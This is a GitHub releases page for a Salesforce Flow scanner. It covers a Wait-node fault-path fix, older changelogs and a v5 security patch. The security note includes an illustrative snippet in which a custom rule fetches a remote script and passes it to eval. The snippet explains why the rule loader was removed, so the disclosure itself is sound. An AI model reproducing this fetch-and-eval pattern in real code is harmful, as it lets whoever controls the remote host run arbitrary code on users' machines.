Releases: Flow-Scanner/lightning-flow-scanner-core
MissingFaultPath bug fix for Wait nodes
v5.9 — Fix MissingFaultPath rule for Wait nodes
This release fixes issue #272, contributed by @chazwatkins, where the MissingFaultPath rule incorrectly flagged all "Wait" nodes.
The bug was caused because the rule did not distinguish between different Wait subtypes. In Salesforce flows, only "Wait For Conditions" nodes can have fault paths. "Wait for Amount of Time" (WaitDuration) and "Wait Until Date" (WaitDate) nodes cannot have fault paths. This fix updates the MissingFaultPath rule to properly ignore WaitDuration and WaitDate subtypes, while continuing to check for applicable cases.
Salesforce Wait Nodes Overview
1. Wait for Conditions
- Lets a flow pause until certain conditions are true.
- This is essentially an event-based pause and can have error handling logic attached — so a fault path is valid here.
- For more details, refer to the Salesforce documentation on Wait for Conditions.
2. Wait for Amount of Time (WaitDuration)
- Pauses flow for a fixed amount of time.
- This is purely time-based with no real failure conditions that Salesforce would allow fault handling for.
- Therefore, no fault path option is provided.
- For more information, see the Salesforce documentation on Wait for Amount of Time.
3. Wait Until Date (WaitDate)
- Pauses flow until a given date/time.
- Also purely time-based → no fault path.
- For further details, check the Salesforce documentation on Wait Until Date.
Changes
- Added
isValidSubtypemethod to properly handle applicable element subtypes. - Updated MissingFaultPath rule execution logic.
Contributors
Assets 2
Security Patch
🚨 v5 – Security Patch
This release delivers security improvements and we have removed custom rules.
🔒 Security Fixes
- Removed custom rule loader
- Previous versions allowed configuration files to load JavaScript from external sources.
- This created a arbitrary code execution (ACE) risk, where malicious configs could execute arbitrary code.
execute(flow: Flow, ruleOptions?: {}): RuleResult {
fetch("https://example.com/script.js")
.then(res => res.text())
.then(code => {
eval(code); // 🚨 ACE happens here
});
return null;
}
- In v5, this behavior has been completely removed. Only built-in rules are now supported.
- Removed dynamic paths in configuration
- Config files can no longer point to external scripts or resources.
🛡 Dependency & Audit Updates
- All dependencies updated to their latest secure versions.
- Applied
npm audit fixto patch known vulnerabilities.
📌 Impact
- Custom rules functionality has been retired.
- All packages that relied on the custom rule loader are unpublished
Note on Forks:
Using a fork? Check node_modules/ for RuleLoader.ts or RuleLoader.js. If present, it’s vulnerable.
4.51.0
Full Changelog: v4.50.0...v4.51.0
4.50.0
What's Changed
- Drop support for IRuleDefinition
- chore: bump npm deps by @junners in #254
- Feat/streamline rule def by @junners in #255
Full Changelog: v4.49.0...v4.50.0
Contributors
Assets 2
4.49.0
What's Changed
- MissingNullHandler triggered on subflow output variables #67 by @RubenHalman in #241
- Replace table with referable headers by @RubenHalman in #248
Full Changelog: v4.48.0...v4.49.0
Contributors
Assets 2
4.48.0
Full Changelog: v4.47.0...v4.48.0
4.47.0
What's Changed
- Update issue templates by @RubenHalman in #238
- script:deploy test flows by @RubenHalman in #239
- small fixes for Missing Null Handler
Full Changelog: v4.46.0...v4.47.0
Contributors
Assets 2
4.46.0 | Community Release
4.45.0 | Community Release
What's new?
- Minor fix to propagate suppression entity from advanced rule to rule common
Full Changelog: v4.44.0...v4.45.0
4.44.0 | Community Relese
What's new?
New rule disabled option. This option will bubble up rules and be intentional on the configurations. Bubbling up rules would also increase visibility of new rules that can be adopted
rules:
MissingFaultPath:
disabled: trueFull Changelog: v4.43.0...v4.44.0